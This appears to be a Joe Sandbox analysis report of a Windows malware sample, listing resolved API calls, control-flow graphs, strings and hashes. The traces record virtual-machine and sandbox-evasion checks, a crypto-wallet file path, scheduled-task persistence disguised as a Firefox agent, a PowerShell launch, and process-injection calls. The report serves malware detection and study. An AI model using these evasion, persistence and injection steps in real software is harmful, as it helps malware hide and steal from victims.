GetFileAttributesW 31->33 32->33 34 e488e8-e488f4 GetFileAttributesW 32->34 35 e48b49-e48b6c ExpandEnvironmentStringsW GetFileAttributesW 33->35 36 e48a89-e48a8b 33->36 34->33 39 e488fa-e488fc 34->39 37 e48b93-e48bf9 GetComputerNameW GetUserNameW 35->37 38 e48b6e-e48b70 35->38 36->35 40 e48a91-e48abd CreateFileW 36->40 43 e48c00-e48c12 lstrcmpW 37->43 38->37 41 e48b72-e48b87 GetFileAttributesExW 38->41 39->33 42 e48902-e4893b CreateFileW 39->42 44 e48b02-e48b0a 40->44 45 e48abf-e48ade GetFileSize GetProcessHeap HeapAlloc 40->45 41->37 48 e48b89-e48b8d 41->48 49 e4893d-e4895e GetFileSize GetProcessHeap HeapAlloc 42->49 50 e4897e-e489a3 CreateFileW 42->50 43->12 51 e48c18-e48c1d 43->51 46 e48b0c-e48b28 lstrcmpA 44->46 47 e48b2b-e48b2d 44->47 52 e48ae0-e48af6 ReadFile 45->52 53 e48af9-e48afc CloseHandle 45->53 46->47 54 e48b3f-e48b43 47->54 55 e48b2f-e48b39 GetProcessHeap HeapFree 47->55 48->12 48->37 56 e48977-e48978 CloseHandle 49->56 57 e48960-e48974 ReadFile 49->57 59 e489a5-e489c4 GetFileSize GetProcessHeap HeapAlloc 50->59 60 e489e8-e489f0 50->60 51->43 58 e48c1f-e48c33 StrStrW 51->58 52->53 53->44 54->12 54->35 55->54 56->50 57->56 58->12 63 e48c39-e48c49 lstrcmpW 58->63 64 e489c6-e489dc ReadFile 59->64 65 e489df-e489e2 CloseHandle 59->65 61 e489f2-e489f6 60->61 62 e48a29-e48a2e 60->62 61->62 66 e489f8-e48a08 lstrcmpA 61->66 67 e48a40-e48a42 62->67 68 e48a30-e48a3a GetProcessHeap HeapFree 62->68 69 e48c5e-e48c6e 63->69 70 e48c4b-e48c58 lstrcmpW 63->70 64->65 65->60 66->62 72 e48a0a-e48a26 lstrcmpA 66->72 73 e48a54-e48a58 67->73 74 e48a44-e48a4e GetProcessHeap HeapFree 67->74 68->67 71 e48c75-e48c84 lstrcmpW 69->71 70->12 70->69 71->12 75 e48c8a-e48c8f 71->75 72->62 73->12 73->33 74->73 75->71 76 e48c91-e48cbe GlobalMemoryStatusEx 75->76 76->12 77 e48cc4-e48cd4 lstrcmpW 76->77 78 e48cd6-e48ce3 lstrcmpW 77->78 79 e48cf1-e48d0c PathCombineW 77->79 78->79 80 e48ce5-e48ceb 78->80 81 e48d10-e48d1e 79->81 80->12 80->79 81->81 82 e48d20-e48d3a FindFirstFileW 81->82 83 e48d40-e48d47 82->83 84 e48e32-e48e5f GetModuleFileNameW StrStrIW 82->84 85 e48d50-e48d60 lstrcmpW 83->85 86 e48e04-e48e14 FindNextFileW 85->86 87 e48d66-e48d76 lstrcmpW 85->87 86->85 88 e48e1a-e48e2c FindClose 86->88 87->86 89 e48d7c-e48d8e 87->89 88->12 88->84 90 e48da7-e48db9 lstrcmpW 89->90 91 e48d90-e48da5 89->91 92 e48dc7-e48dd1 lstrcmpW 90->92 93 e48dbb-e48dc5 lstrcmpW 90->93 91->90 91->91 95 e48dd3-e48ddd lstrcmpW 92->95 96 e48ddf-e48df0 92->96 93->92 94 e48e01 93->94 94->86 95->94 95->96 96->86 97 e48df2-e48df9 96->97 97->86 98 e48dfb-e48dff 97->98 98->86
                APIs
                • EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 00E4869E
                • StrStrIW.KERNELBASE(?,Hyper-V), ref: 00E486BD
                • StrStrIW.SHLWAPI(?,VMWare), ref: 00E486D3
                • StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 00E486E9
                • StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 00E486FF
                • EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 00E48714
                • GetModuleHandleA.KERNEL32(kernel32), ref: 00E4871F
                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E48733
                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E4873E
                • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 00E4876D
                • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 00E48780
                • GetFileAttributesW.KERNELBASE(?), ref: 00E4878F
                • GetFileAttributesW.KERNEL32(?), ref: 00E487A1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: AddressAttributesDevicesDisplayEnumEnvironmentExpandFileProcStrings$HandleModule
                • String ID: %appdata%\Jaxx\Local Storage\wallet.dat$%systemroot%\System32\VBoxService.exe$%systemroot%\System32\VBoxTray.exe$( $7$7$@$ANNA-PC$Anna$Are.docx$BAIT$Bruno$DESKTOP-ET51AJO$FORTI-PC$Files.docx$Harry Johnson$Hyper-V$Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo$Joe Cage$OpenVPN.txt$Opened.docx$Puser$Parallels Display Adapter$Paul user$Recently.docx$Red Hat QXL controller$Resource.txt$SFTOR-PC$STRAZNJICA.GRUBUTT$These.docx$VMWare$WDAGUtilityAccount$WILLCARTER-PC$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$d5.vc/g$doc$docx$kernel32$new songs.txt$powershell.exe$sal.rosenburg$xls$xlsx
                • API String ID: 4266617301-1396385811
                • Opcode ID: de237524478bf4acf1033df0f91d9dee89473dc92c7721bf7913c13e375a0142
                • Instruction ID: 159de5011824009576dc10c81765f7a78e3606f9744e21a7a225e2ac3f2e449e
                • Opcode Fuzzy Hash: de237524478bf4acf1033df0f91d9dee89473dc92c7721bf7913c13e375a0142
                • Instruction Fuzzy Hash: F6229E75D00219AFDF20CBA5ED48FEEB7BCAF45708F50159AE614F2190EB709A498F60

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 99 621300-621350 GetModuleHandleA VirtualAlloc 100 621352-621354 99->100 101 621359-621387 call 626380 99->101 102 6216a6-6216b3 call 623a94 100->102 106 621395-6213a2 101->106 108 6213e1-6213f9 106->108 109 6213a4-6213df call 626380 106->109 110 6214ef-621528 call 6211f0 VirtualProtect 108->110 111 6213ff-621406 108->111 109->106 119 621536-621543 110->119 111->110 114 62140c-621417 111->114 118 621422-621429 114->118 118->110 120 62142f-621463 GetModuleHandleA GetProcAddress LoadLibraryA 118->120 121 62164a-621663 119->121 122 621549-621571 119->122 123 6214ea 120->123 124 621469-621486 120->124 126 6216a3 121->126 127 621665-621679 121->127 128 621593-6215ad 122->128 129 621573-621591 VirtualFree 122->129 123->118 130 621488-62148b 124->130 131 62148e 124->131 126->102 132 621684-621688 127->132 134 6215b8 128->134 135 6215af-6215b6 128->135 133 62152a-621532 129->133 130->131 136 6214a2-6214a8 131->136 132->126 137 62168a-621690 132->137 133->119 138 6215bf-6215c7 134->138 135->138 136->123 139 6214aa-6214b5 136->139 137->126 140 621692-6216a1 137->140 141 6215d2 138->141 142 6215c9-6215d0 138->142 143 6214c6-6214d2 139->143 144 6214b7-6214c4 139->144 140->132 145 6215d9-6215e2 141->145 142->145 146 6214d5-6214e8 GetProcAddress 143->146 144->146 148 6215e4-6215eb 145->148 149 6215ed 145->149 146->136 151 6215f4-621616 148->151 149->151 153 621624-62163f VirtualProtect 151->153 154 621618-621621 151->154 153->121 154->153
                APIs
                • GetModuleHandleA.KERNEL32(kernel32), ref: 0062132A
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00621343
                • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA), ref: 00621439
                • GetProcAddress.KERNEL32(00000000), ref: 00621440
                • LoadLibraryA.KERNELBASE(?), ref: 00621459
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: HandleModule$AddressAllocLibraryLoadProcVirtual
                • String ID: LoadLibraryA$kernel32
                • API String ID: 3393750808-970291620
                • Opcode ID: 022bb5f2c6fceaf3a03599cc82ee8d2a927eb6e003a504c6f04a995a6d822c57
                • Instruction ID: ab8bca32f3308c3a9ac4d43f1130129594db3cff6b21cc8b5b06561bc5b2af3e
                • Opcode Fuzzy Hash: 022bb5f2c6fceaf3a03599cc82ee8d2a927eb6e003a504c6f04a995a6d822c57
                • Instruction Fuzzy Hash: 25D1F7B4E04629DFCB18CF98D894AEDB7B2FF59304F148159E406AB395D734A982CF50

                Control-flow Graph

                APIs
                • LPtoDP.GDI32(00000000,000C2BFF,020ECD74), ref: 00622F77
                • GetLastError.KERNEL32 ref: 00622F81
                • ExitProcess.KERNEL32 ref: 00622F8E
                • BuildCommDCBAndTimeoutsA.KERNEL32(jhl46745fghb,00000000,00000000), ref: 00622F9D
                • GetCurrentProcess.KERNEL32(00000000), ref: 00622FA9
                • TerminateProcess.KERNEL32(00000000), ref: 00622FB0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: Process$BuildCommCurrentErrorExitLastTerminateTimeouts
                • String ID: jhl46745fghb
                • API String ID: 3772419538-1856006033
                • Opcode ID: 18894e015210280a6cbb12a65f22d5bb88f520cd325c05c87718265bf571f2eb
                • Instruction ID: 4d59bb135c48adf6f74dca94a36f88bd7aeea64e20791a5dadaef320d342cc2c
                • Opcode Fuzzy Hash: 18894e015210280a6cbb12a65f22d5bb88f520cd325c05c87718265bf571f2eb
                • Instruction Fuzzy Hash: C301B134A40318BFD764EFA0EE0AB9D77B6AF06701F0080A8F506AA1D1DF749944CF92

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 169 e48e60-e48e77 GetUserDefaultLangID 170 e48f0c-e48f0e ExitProcess 169->170 171 e48e7d-e48e85 169->171 171->170 172 e48e8b-e48e93 171->172 172->170 173 e48e95-e48e9d 172->173 173->170 174 e48e9f-e48ea7 173->174 174->170 175 e48ea9-e48eb1 174->175 175->170 176 e48eb3-e48ebb 175->176 176->170 177 e48ebd-e48ec5 176->177 177->170 178 e48ec7-e48ecf 177->178 178->170 179 e48ed1-e48ed9 178->179 179->170 180 e48edb-e48ee3 179->180 180->170 181 e48ee5 call e48660 180->181 183 e48eea-e48eec 181->183 183->170 184 e48eee-e48f07 call e48380 call e471b0 call e48fc0 call e47690 call e48570 183->184 184->170
                APIs
                • GetUserDefaultLangID.KERNEL32 ref: 00E48E66
                • ExitProcess.KERNEL32 ref: 00E48F0E
                  • Part of subcall function 00E48660: EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 00E4869E
                  • Part of subcall function 00E48660: StrStrIW.KERNELBASE(?,Hyper-V), ref: 00E486BD
                  • Part of subcall function 00E48660: StrStrIW.SHLWAPI(?,VMWare), ref: 00E486D3
                  • Part of subcall function 00E48660: StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 00E486E9
                  • Part of subcall function 00E48660: StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 00E486FF
                  • Part of subcall function 00E48660: EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 00E48714
                  • Part of subcall function 00E48660: GetModuleHandleA.KERNEL32(kernel32), ref: 00E4871F
                  • Part of subcall function 00E48660: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E48733
                  • Part of subcall function 00E48660: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E4873E
                  • Part of subcall function 00E48660: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 00E4876D
                  • Part of subcall function 00E48660: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 00E48780
                  • Part of subcall function 00E48660: GetFileAttributesW.KERNELBASE(?), ref: 00E4878F
                  • Part of subcall function 00E48660: GetFileAttributesW.KERNEL32(?), ref: 00E487A1
                  • Part of subcall function 00E48380: InitializeCriticalSection.KERNEL32(00E4A080), ref: 00E483A2
                  • Part of subcall function 00E48380: GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00E483CF
                  • Part of subcall function 00E48380: StringFromGUID2.OLE32(?,?,00000080), ref: 00E48428
                  • Part of subcall function 00E48380: wsprintfA.USER32 ref: 00E4843F
                  • Part of subcall function 00E48380: CreateMutexW.KERNEL32(00000000,00000001,?), ref: 00E48453
                  • Part of subcall function 00E48380: GetLastError.KERNEL32 ref: 00E4845E
                  • Part of subcall function 00E48380: WSAStartup.WS2_32(00000202,?), ref: 00E4849C
                  • Part of subcall function 00E48380: CryptAcquireContextA.ADVAPI32(00E4A4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 00E484B5
                  • Part of subcall function 00E48380: CryptAcquireContextA.ADVAPI32(00E4A4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 00E484D1
                  • Part of subcall function 00E471B0: ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 00E471D1
                  • Part of subcall function 00E471B0: lstrlenW.KERNEL32(?), ref: 00E471DA
                  • Part of subcall function 00E471B0: ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 00E471F5
                  • Part of subcall function 00E471B0: GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 00E47203
                  • Part of subcall function 00E471B0: GetLastError.KERNEL32 ref: 00E4720D
                  • Part of subcall function 00E471B0: ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\agent.js,?,00000104), ref: 00E47224
                  • Part of subcall function 00E471B0: wnsprintfW.SHLWAPI ref: 00E4723E
                  • Part of subcall function 00E471B0: SetFileAttributesW.KERNEL32(?,00000006), ref: 00E4725E
                  • Part of subcall function 00E48FC0: CryptGenRandom.ADVAPI32(00000020,?), ref: 00E48FD8
                  • Part of subcall function 00E48FC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E49035
                  • Part of subcall function 00E48FC0: HeapFree.KERNEL32(00000000), ref: 00E4903C
                  • Part of subcall function 00E48FC0: wsprintfA.USER32 ref: 00E4906F
                  • Part of subcall function 00E48FC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E490A8
                  • Part of subcall function 00E48FC0: HeapFree.KERNEL32(00000000), ref: 00E490AB
                  • Part of subcall function 00E48FC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E490B0
                  • Part of subcall function 00E48FC0: HeapFree.KERNEL32(00000000), ref: 00E490B3
                  • Part of subcall function 00E47690: LsaOpenPolicy.ADVAPI32(00000000,00E4A060,00000001,?), ref: 00E476CC
                  • Part of subcall function 00E47690: LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 00E476DF
                  • Part of subcall function 00E47690: GetProcessHeap.KERNEL32(00000008,?), ref: 00E476FB
                  • Part of subcall function 00E47690: HeapAlloc.KERNEL32(00000000), ref: 00E47702
                  • Part of subcall function 00E47690: LsaFreeMemory.ADVAPI32(?), ref: 00E4773C
                  • Part of subcall function 00E47690: LsaClose.ADVAPI32(?), ref: 00E47745
                  • Part of subcall function 00E47690: GetComputerNameW.KERNEL32(?,?), ref: 00E47764
                  • Part of subcall function 00E47690: GetUserNameW.ADVAPI32(?,00000101), ref: 00E47775
                  • Part of subcall function 00E48570: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 00E48591
                  • Part of subcall function 00E48570: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 00E485A4
                  • Part of subcall function 00E48570: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 00E485B7
                  • Part of subcall function 00E48570: GetFileAttributesW.KERNEL32(?), ref: 00E485DD
                  • Part of subcall function 00E48570: lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 00E4860D
                  • Part of subcall function 00E48570: wnsprintfW.SHLWAPI ref: 00E48630
                  • Part of subcall function 00E48570: ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 00E48652
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: EnvironmentExpandHeapStrings$Process$AttributesFileFree$Crypt$AcquireAddressContextDevicesDisplayEnumErrorInformationLastNamePolicyProcUserwnsprintfwsprintf$AllocCloseComputerCreateCriticalDefaultDirectoryExecuteExitFromHandleInitializeLangMemoryModuleMutexOpenQueryRandomSectionShellStartupStringSystemVolumeWow64lstrcpylstrlen
                • String ID:
                • API String ID: 1304186597-0
                • Opcode ID: d57b4baa0a32f576ff2a37c42c94b22d6f0357d04bd1a6d6b883072e984504bb
                • Instruction ID: db22a23d31ad7a015005cbe898589f4c2185fe11b01915fdd6318f5d228e9014
                • Opcode Fuzzy Hash: d57b4baa0a32f576ff2a37c42c94b22d6f0357d04bd1a6d6b883072e984504bb
                • Instruction Fuzzy Hash: 28015C5C70710A4ADE34B55876212BC2283DFC2325FC8A165BBD577DC5EE040E8B026F

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 195 621710-62175a call 621110 * 2 200 621760-621764 195->200 201 62183f-621858 call 626940 call 623a94 195->201 200->201 202 62176a-62176e 200->202 202->201 204 621774-621778 202->204 204->201 206 62177e-62179c call 626b68 204->206 211 6217a7-6217ad 206->211 212 6217c2-62182b call 6216c0 call 621300 GetPEB GetUserDefaultLCID call 626940 211->212 213 6217af-6217c0 211->213 220 621830-62183c call 626940 212->220 213->211 220->201
                APIs
                  • Part of subcall function 00621110: GetModuleHandleA.KERNEL32(kernel32), ref: 0062111B
                  • Part of subcall function 00621110: GetModuleHandleW.KERNEL32(00000000), ref: 00621162
                • GetUserDefaultLCID.KERNELBASE ref: 00621824
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: HandleModule$DefaultUser
                • String ID:
                • API String ID: 3008646163-0
                • Opcode ID: 9c7918398ba9d52a130480caec1ff2e122979b3e2e8279a8b97ee2a306153f8d
                • Instruction ID: 38c88394aab9fc9f19608075cc50cdb66f7b1c15f41ac0ad7cb6cb32713278a2
                • Opcode Fuzzy Hash: 9c7918398ba9d52a130480caec1ff2e122979b3e2e8279a8b97ee2a306153f8d
                • Instruction Fuzzy Hash: CA4155B4E002199FCF44DF98E885AEEB7B2BF58304F148558E905BB341DB34AA41CFA5

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 282 e46c00-e46c59 VariantInit CoCreateInstance 283 e46cb9 282->283 284 e46c5b-e46c8a 282->284 285 e46cbc-e46cbf 283->285 284->283 290 e46c8c-e46cac SysAllocString 284->290 286 e46cc3-e46ccb 285->286 288 e46cd0-e46cd4 286->288 289 e46ccd-e46cce SysFreeString 286->289 291 e4702a-e4702f 288->291 292 e46cda-e46d0b SysAllocString SysFreeString 288->292 289->288 290->285 296 e46cae-e46cb7 290->296 293 e47037-e47040 291->293 294 e47031-e47033 291->294 298 e46d2d-e46d2f 292->298 299 e46d0d-e46d2a SysAllocString SysFreeString 292->299 294->293 296->286 300 e46d31-e46d47 SysAllocString SysFreeString 298->300 301 e46d49-e46d61 298->301 299->298 300->301 305 e46d67-e46d7d 301->305 306 e47021-e47025 301->306 308 e46dc0-e46dd6 305->308 309 e46d7f-e46dbb SysAllocString SysFreeString SysAllocString SysFreeString 305->309 306->291 312 e46e24-e46e48 308->312 313 e46dd8-e46e1f SysAllocString SysFreeString 308->313 309->308 317 e46ee6-e46eeb 312->317 318 e46e4e-e46e5f 312->318 313->312 320 e46ef3-e46ef8 317->320 321 e46eed-e46eef 317->321 318->317 326 e46e65-e46e78 318->326 324 e46f00-e46f24 320->324 325 e46efa-e46efc 320->325 321->320 331 e46f86-e46f8b 324->331 332 e46f26-e46f37 324->332 325->324 326->317 333 e46e7a-e46ebc SysAllocString SysFreeString SysAllocString SysFreeString 326->333 334 e46f93-e46f98 331->334 335 e46f8d-e46f8f 331->335 332->331 343 e46f39-e46f4c 332->343 350 e46edd-e46ee1 333->350 351 e46ebe-e46ed8 SysAllocString SysFreeString 333->351 337 e46fa0-e46fa4 334->337 338 e46f9a-e46f9c 334->338 335->334 340 e46fa6-e47012 VariantInit SysAllocString * 2 SysFreeString VariantClear 337->340 341 e47018-e4701c 337->341 338->337 340->341 341->306 343->331 347 e46f4e-e46f69 SysAllocString SysFreeString 343->347 352 e46f7d-e46f81 347->352 353 e46f6b-e46f7b SysAllocString SysFreeString 347->353 350->317 351->350 352->331 353->352
                APIs
                • VariantInit.OLEAUT32(?), ref: 00E46C1E
                • CoCreateInstance.OLE32(00E41020,00000000,00000001,00E41000,?,?,74DF0EE0), ref: 00E46C4B
                • SysAllocString.OLEAUT32(00E41498), ref: 00E46C91
                • SysFreeString.OLEAUT32(?), ref: 00E46CCE
                • SysAllocString.OLEAUT32(\Mozilla), ref: 00E46CDF
                • SysFreeString.OLEAUT32(00000000), ref: 00E46D01
                • SysAllocString.OLEAUT32(\Mozilla), ref: 00E46D12
                • SysFreeString.OLEAUT32(00000000), ref: 00E46D28
                • SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 00E46D36
                • SysFreeString.OLEAUT32(00000000), ref: 00E46D47
                • SysAllocString.OLEAUT32(The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic), ref: 00E46D84
                • SysFreeString.OLEAUT32(00000000), ref: 00E46D93
                • SysAllocString.OLEAUT32(Mozilla), ref: 00E46D9A
                • SysFreeString.OLEAUT32(00000000), ref: 00E46DA9
                • SysAllocString.OLEAUT32(PT0S), ref: 00E46DFE
                • SysFreeString.OLEAUT32(00000000), ref: 00E46E0D
                • SysAllocString.OLEAUT32(Trigger1), ref: 00E46E7F
                • SysFreeString.OLEAUT32(00000000), ref: 00E46E8E
                • SysAllocString.OLEAUT32(2023-01-01T12:00:00), ref: 00E46E95
                • SysFreeString.OLEAUT32(00000000), ref: 00E46EA4
                • SysAllocString.OLEAUT32(PT1M), ref: 00E46EC3
                • SysFreeString.OLEAUT32(00000000), ref: 00E46ED2
                • SysAllocString.OLEAUT32(C:\Windows\System32\wscript.exe), ref: 00E46F53
                • SysFreeString.OLEAUT32(00000000), ref: 00E46F62
                • SysAllocString.OLEAUT32(?), ref: 00E46F6C
                • SysFreeString.OLEAUT32(00000000), ref: 00E46F7B
                • VariantInit.OLEAUT32(?), ref: 00E46FAA
                • SysAllocString.OLEAUT32(00E4113C), ref: 00E46FBE
                • SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 00E46FCF
                • SysFreeString.OLEAUT32(00000000), ref: 00E4700C
                • VariantClear.OLEAUT32(?), ref: 00E47012
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: String$Alloc$Free$Variant$Init$ClearCreateInstance
                • String ID: 2023-01-01T12:00:00$C:\Windows\System32\wscript.exe$Firefox Default Browser Agent 458046B0AF4A39CB$Mozilla$PT0S$PT1M$The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic$Trigger1$\Mozilla
                • API String ID: 3904693211-711907784
                • Opcode ID: 6f7076799fc5dd9558de2444e4545adcaaf120cdc60fc2ee5b689ac7ae7d2a75
                • Instruction ID: 4cbd48a06624c4b4fa793c066247654b04b8f3d4ac67735d69debe5e9f7aab0e
                • Opcode Fuzzy Hash: 6f7076799fc5dd9558de2444e4545adcaaf120cdc60fc2ee5b689ac7ae7d2a75
                • Instruction Fuzzy Hash: 25F1FA70A00219AFDB14DFA9D988FAEBBF8EF49304F105198F505EB250DB71AD45CB61

                Control-flow Graph

                APIs
                • GetModuleHandleW.KERNEL32(ntdll), ref: 00E45ECD
                • GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 00E45EE1
                • GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 00E45EEC
                • GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 00E45EF7
                • GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 00E45F02
                • GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00E45F0D
                • GetTempPathW.KERNEL32(000000F6,?), ref: 00E45F26
                  • Part of subcall function 00E424E0: GetTickCount.KERNEL32 ref: 00E424E2
                • wnsprintfW.SHLWAPI ref: 00E45F61
                • PathCombineW.SHLWAPI(?,?,?), ref: 00E45F7B
                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 00E45FA2
                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00E45FC6
                • SetEndOfFile.KERNEL32(00000000), ref: 00E45FC9
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E45FD6
                • wnsprintfW.SHLWAPI ref: 00E45FF4
                • RtlInitUnicodeString.NTDLL(?,?), ref: 00E4600A
                • RtlInitUnicodeString.NTDLL(?,?), ref: 00E46017
                • GetCurrentProcess.KERNEL32(00000004,00000000,00000000,00000000,00000000), ref: 00E46056
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E460A5
                • WriteFile.KERNEL32(00000000,00000000,00000400,00000000,00000000), ref: 00E460EF
                • FlushFileBuffers.KERNEL32(00000000), ref: 00E460F7
                • SetEndOfFile.KERNEL32(00000000), ref: 00E460FE
                • NtQueryInformationProcess.NTDLL ref: 00E46113
                • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 00E4613B
                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 00E46192
                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00E461CE
                • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 00E461DC
                • NtClose.NTDLL ref: 00E46215
                • NtClose.NTDLL ref: 00E46226
                • NtClose.NTDLL ref: 00E46230
                • CloseHandle.KERNEL32(00000000), ref: 00E46233
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
